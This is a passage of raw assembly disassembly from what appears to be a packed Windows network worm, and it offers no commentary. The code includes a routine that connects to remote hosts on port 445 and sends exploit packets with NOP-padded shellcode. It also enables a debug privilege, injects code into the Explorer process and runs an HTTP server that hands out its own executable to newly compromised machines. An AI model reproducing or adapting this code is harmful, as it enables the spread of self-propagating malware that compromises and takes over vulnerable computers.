var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31432EC0
mov eax, dword_31434CAC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31434CB0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_3143115C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31431F1C
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31431160 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_314310A0 ; lstrcpyn
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31434CA0
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31431A2F: ; CODE XREF: sub_314319BC+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31431A2F
push 60h
lea eax, [ebp+var_E4]
push offset dword_314347C0
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31432EAC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31432EB2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31432EAC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31432EAC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31432EAC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31432EB2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31432EA6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31432EA6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31431164 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31431168 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31431F12
mov esi, dword_3143109C
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_3143116C
push 89h
push offset dword_314345A8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0A8h
push offset dword_31434634
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0DEh
push offset dword_314346E0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
cmp eax, 46h
jl loc_31431F07
cmp [ebp+var_730], 31h
jnz loc_31431DB2
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31432EA6 ; memset
add esp, 0Ch
push offset byte_314342E0
call dword_31431088 ; lstrlen
push eax
lea eax, [ebp+var_EA4]
push offset byte_314342E0
push eax
call sub_31432EB2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31431088 ; lstrlen
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31432EB2 ; memcpy
mov eax, dword_31434BE6
add esp, 0Ch
mov [ebp+var_798], eax
loc_31431C53: ; CODE XREF: sub_314319BC+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 68h
push offset dword_31434824
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0A0h
push offset dword_31434890
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
cmp [ebp+arg_0], 0
jz loc_31431EA2
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31434A48
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31432EB2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31434AB4
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31432EB2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31434B28
push eax
call sub_31432EB2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31431EFA
; ---------------------------------------------------------------------------
loc_31431DB2: ; CODE XREF: sub_314319BC+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31432EA6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31434C20
push eax
call sub_31432EB2 ; memcpy
push offset byte_314342E0
call sub_31432EAC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_314342E0
push eax
call sub_31432EB2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31434C98
push eax
call sub_31432EB2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31434C20
push eax
call sub_31432EB2 ; memcpy
add esp, 40h
push offset byte_314342E0
call sub_31432EAC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_314342E0
push eax
call sub_31432EB2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31431E4E: ; CODE XREF: sub_314319BC+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31431E4E
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31432EA6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31432EA6 ; memset
add esp, 18h
jmp loc_31431C53
; ---------------------------------------------------------------------------
loc_31431EA2: ; CODE XREF: sub_314319BC+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31434934
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31432EB2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_314349B4
push eax
call sub_31432EB2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31431EFA: ; CODE XREF: sub_314319BC+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31431F07: ; CODE XREF: sub_314319BC+1AD�j
; sub_314319BC+1E1�j ...
push 2
push [ebp+var_4]
call dword_31431174 ; shutdown
loc_31431F12: ; CODE XREF: sub_314319BC+166�j
push [ebp+var_4]
call dword_31431178 ; closesocket
pop esi
loc_31431F1C: ; CODE XREF: sub_314319BC+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_314319BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431F23 proc near ; CODE XREF: UPX0:loc_31432531�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_314310AC ; LoadLibraryA
mov esi, dword_314310A8
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31431FA7
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31431FA7
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31431FA7
lea eax, [ebp+var_C]
push eax
push 20h
call dword_314310A4 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31431FA7: ; CODE XREF: sub_31431F23+28�j
; sub_31431F23+37�j ...
pop edi
pop esi
leave
retn
sub_31431F23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431FAB proc near ; CODE XREF: UPX0:31432545�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31435040
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_314310B8 ; GetModuleHandleA
mov esi, dword_314310A8
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31431FF2
loc_31431FEE: ; CODE XREF: sub_31431FAB+54�j
push 1
jmp short loc_31432043
; ---------------------------------------------------------------------------
loc_31431FF2: ; CODE XREF: sub_31431FAB+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31431FEE
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31431114 ; FindWindowA
test eax, eax
jnz short loc_31432020
call dword_31431118 ; GetForegroundWindow
test eax, eax
jnz short loc_31432020
push 2
jmp short loc_31432043
; ---------------------------------------------------------------------------
loc_31432020: ; CODE XREF: sub_31431FAB+65�j
; sub_31431FAB+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_3143111C ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_314310B4 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31432046
push 3
loc_31432043: ; CODE XREF: sub_31431FAB+45�j
; sub_31431FAB+73�j
pop eax
jmp short loc_314320B1
; ---------------------------------------------------------------------------
loc_31432046: ; CODE XREF: sub_31431FAB+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_31431080
test eax, eax
jz short loc_314320A4
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_314310B0 ; WriteProcessMemory
push dword_31435034
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31432090
push eax
call esi ; CloseHandle
jmp short loc_314320AB
; ---------------------------------------------------------------------------
loc_31432090: ; CODE XREF: sub_31431FAB+DE�j
push offset aUterm192 ; "uterm19-2"
call sub_314320E4
pop ecx
mov [ebp+var_4], 5
jmp short loc_314320AB
; ---------------------------------------------------------------------------
loc_314320A4: ; CODE XREF: sub_31431FAB+B2�j
mov [ebp+var_4], 4
loc_314320AB: ; CODE XREF: sub_31431FAB+E3�j
; sub_31431FAB+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_314320B1: ; CODE XREF: sub_31431FAB+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31431FAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314320B6 proc near ; CODE XREF: sub_3143237F+B�p
; UPX0:31432507�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_314310BC ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_314310EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_314320B6 endp
; =============== S U B R O U T I N E =======================================
sub_314320E4 proc near ; CODE XREF: sub_31431FAB+EA�p
; UPX0:31432511�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_314310C0 ; CreateMutexA
retn
sub_314320E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314320F3 proc near ; CODE XREF: sub_3143256D+163�p
; sub_3143256D+16E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314310C4 ; CreateThread
pop ebp
retn
sub_314320F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143210D proc near ; CODE XREF: sub_3143237F+12C�p
; sub_3143278A+59�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314310C4 ; CreateThread
push eax
call dword_31431080 ; CloseHandle
pop ebp
retn
sub_3143210D endp
; =============== S U B R O U T I N E =======================================
sub_3143212E proc near ; CODE XREF: sub_314311A0+68�p
; sub_31432C62+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31432156
loc_3143213F: ; CODE XREF: sub_3143212E+26�j
call dword_314310FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_3143213F
loc_31432156: ; CODE XREF: sub_3143212E+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_3143212E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143215E proc near ; CODE XREF: sub_314311A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31432EA6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_314310C8 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_31431080
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_3143215E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314321B4 proc near ; CODE XREF: sub_31432810+3E�p
; sub_314328D7+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_31431150 ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_314321D5
call dword_31431154 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_314321D5: ; CODE XREF: sub_314321B4+15�j
lea eax, [ebp+var_34]
push eax
call dword_31431158 ; gethostbyname
test eax, eax
jnz short loc_314321EA
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_314321EA: ; CODE XREF: sub_314321B4+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_314321B4 endp
; =============== S U B R O U T I N E =======================================
sub_314321F3 proc near ; CODE XREF: sub_3143185D+12�p
; sub_31432728+21�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31431134 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_314321F3 endp
; =============== S U B R O U T I N E =======================================
sub_31432209 proc near ; CODE XREF: sub_3143256D+F4�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_314310D0 ; OpenEventA
test eax, eax
jz short locret_31432222
push eax
call dword_314310CC ; SetEvent
locret_31432222: ; CODE XREF: sub_31432209+10�j
retn
sub_31432209 endp
; =============== S U B R O U T I N E =======================================
sub_31432223 proc near ; CODE XREF: sub_3143185D+68�p
push esi
mov esi, dword_314310FC
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_31432223 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432239 proc near ; DATA XREF: sub_3143237F+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_3143226A
push 1
jmp loc_31432325
; ---------------------------------------------------------------------------
loc_3143226A: ; CODE XREF: sub_31432239+28�j
mov esi, dword_31431104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31432335
lea eax, [ebp+var_100]
push offset dword_314341F0
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31432335
mov esi, dword_3143116C
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_31435030
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31432EAC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_314322E7: ; CODE XREF: sub_31432239+E8�j
mov eax, dword_31435030
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_314322F9
mov eax, ecx
loc_314322F9: ; CODE XREF: sub_31432239+BC�j
test eax, eax
jz short loc_31432328
push 0
push eax
mov eax, dword_31435028
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31432323
cmp eax, 1000h
jb short loc_31432328
push 64h
add edi, eax
call dword_3143109C ; Sleep
jmp short loc_314322E7
; ---------------------------------------------------------------------------
loc_31432323: ; CODE XREF: sub_31432239+D5�j
push 2
loc_31432325: ; CODE XREF: sub_31432239+2C�j
pop eax
jmp short loc_31432378
; ---------------------------------------------------------------------------
loc_31432328: ; CODE XREF: sub_31432239+C2�j
; sub_31432239+DC�j
push offset dword_3143502C
call dword_314310D8 ; InterlockedIncrement
jmp short loc_31432353
; ---------------------------------------------------------------------------
loc_31432335: ; CODE XREF: sub_31432239+49�j
; sub_31432239+61�j
mov esi, dword_3143116C
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31434D64
push ebx
call esi ; send
loc_31432353: ; CODE XREF: sub_31432239+FA�j
push 7D0h
call dword_3143109C ; Sleep
push 2
push ebx
call dword_31431174 ; shutdown
push ebx
call dword_31431178 ; closesocket
push 0
call dword_314310D4 ; ExitThread
xor eax, eax
loc_31432378: ; CODE XREF: sub_31432239+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31432239 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143237F proc near ; DATA XREF: sub_3143256D+15E�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_314320B6
lea eax, [ebp+var_130]
push 104h
push eax
push offset aCryptographicS ; "Cryptographic Service"
xor ebx, ebx
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_3143502C, ebx
call sub_31432A49
add esp, 14h
test eax, eax
jnz loc_314324B4
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31431084 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_314323EB
push 1
call dword_314310D4 ; ExitThread
loc_314323EB: ; CODE XREF: sub_3143237F+62�j
push ebx
push esi
call dword_314310E0 ; GetFileSize
push eax
mov dword_31435030, eax
call sub_31432E6C
pop ecx
mov dword_31435028, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31435030
push eax
push esi
call dword_314310DC ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31435030, eax
call dword_31431080 ; CloseHandle
push ebx
push 1
push 2
call dword_3143115C ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31432EA6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_3143244D: ; CODE XREF: sub_3143237F+E5�j
; sub_3143237F+ED�j ...
call dword_314310FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_3143503C, eax
jz short loc_3143244D
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_3143244D
push eax
call dword_31431164 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31431144 ; bind
test eax, eax
jnz short loc_3143244D
push 64h
push edi
call dword_31431148 ; listen
mov [ebp+var_8], esi
pop esi
loc_31432496: ; CODE XREF: sub_3143237F+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_3143114C ; accept
push eax
push offset sub_31432239
call sub_3143210D
pop ecx
pop ecx
jmp short loc_31432496
; ---------------------------------------------------------------------------
loc_314324B4: ; CODE XREF: sub_3143237F+3D�j
push ebx
call dword_314310D4 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_3143237F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314324C3 proc near ; CODE XREF: sub_3143256D:loc_314326C5�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_31431140
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_314324C3 endp
; ---------------------------------------------------------------------------
loc_314324EF: ; CODE XREF: UPX1:31437DD8�j
push 0
call dword_314310B8 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31435040, eax
call dword_31431074 ; DeleteFileA
call sub_314320B6
push offset aUterm20 ; "uterm20"
call sub_314320E4
pop ecx
mov dword_31435034, eax
call dword_31431078 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31432531
push 1
call dword_314310E4 ; ExitProcess
loc_31432531: ; CODE XREF: UPX0:31432527�j
call sub_31431F23
call sub_31432BAD
call sub_31432D2E
push offset sub_3143256D
call sub_31431FAB
test eax, eax
pop ecx
jz short loc_31432556
push 0
call sub_3143256D
loc_31432556: ; CODE XREF: UPX0:3143254D�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31432559 proc near ; CODE XREF: sub_3143256D:loc_314326EE�p
; sub_31432728:loc_31432740�p ...
push 0
push dword_31435038
call dword_31431070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31432559 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143256D proc near ; CODE XREF: UPX0:31432551�p
; DATA XREF: UPX0:31432540�o
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31431190
push offset loc_31432EA0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 6Ch
push ebx
push esi
push edi
mov [ebp+var_78], offset aU10x ; "u10x"
mov [ebp+var_74], offset aU11x ; "u11x"
mov [ebp+var_70], offset aU12x ; "u12x"
mov [ebp+var_6C], offset aU13x ; "u13x"
mov [ebp+var_68], offset aU14x ; "u14x"
mov [ebp+var_64], offset aU15x ; "u15x"
mov [ebp+var_60], offset aU16x ; "u16x"
mov [ebp+var_5C], offset aU17x ; "u17x"
mov [ebp+var_58], offset aU18x ; "u18x"
mov [ebp+var_54], offset aU19x ; "u19x"
mov [ebp+var_50], offset aU8 ; "u8"
mov [ebp+var_4C], offset aU9 ; "u9"
mov [ebp+var_48], offset aU10 ; "u10"
mov [ebp+var_44], offset aU11 ; "u11"
mov [ebp+var_40], offset aU12 ; "u12"
mov [ebp+var_3C], offset aU13 ; "u13"
mov [ebp+var_38], offset aU13i ; "u13i"
mov [ebp+var_34], offset aU14 ; "u14"
mov [ebp+var_30], offset aU15 ; "u15"
mov [ebp+var_2C], offset aU16 ; "u16"
mov [ebp+var_28], offset aU17 ; "u17"
mov [ebp+var_24], offset aU18 ; "u18"
mov [ebp+var_20], offset aU19 ; "u19"
mov [ebp+var_1C], offset aU20 ; "u20"
push offset aU20x ; "u20x"
xor edi, edi
push edi
push 1
push edi
call dword_3143106C ; CreateEventA
mov dword_31435038, eax
mov [ebp+var_4], edi
mov [ebp+var_7C], edi
loc_31432654: ; CODE XREF: sub_3143256D+FD�j
cmp [ebp+var_7C], 0Ah
jnb short loc_3143266C
mov eax, [ebp+var_7C]
push [ebp+eax*4+var_78]
call sub_31432209
pop ecx
inc [ebp+var_7C]
jmp short loc_31432654
; ---------------------------------------------------------------------------
loc_3143266C: ; CODE XREF: sub_3143256D+EB�j
mov [ebp+var_7C], edi
loc_3143266F: ; CODE XREF: sub_3143256D+118�j
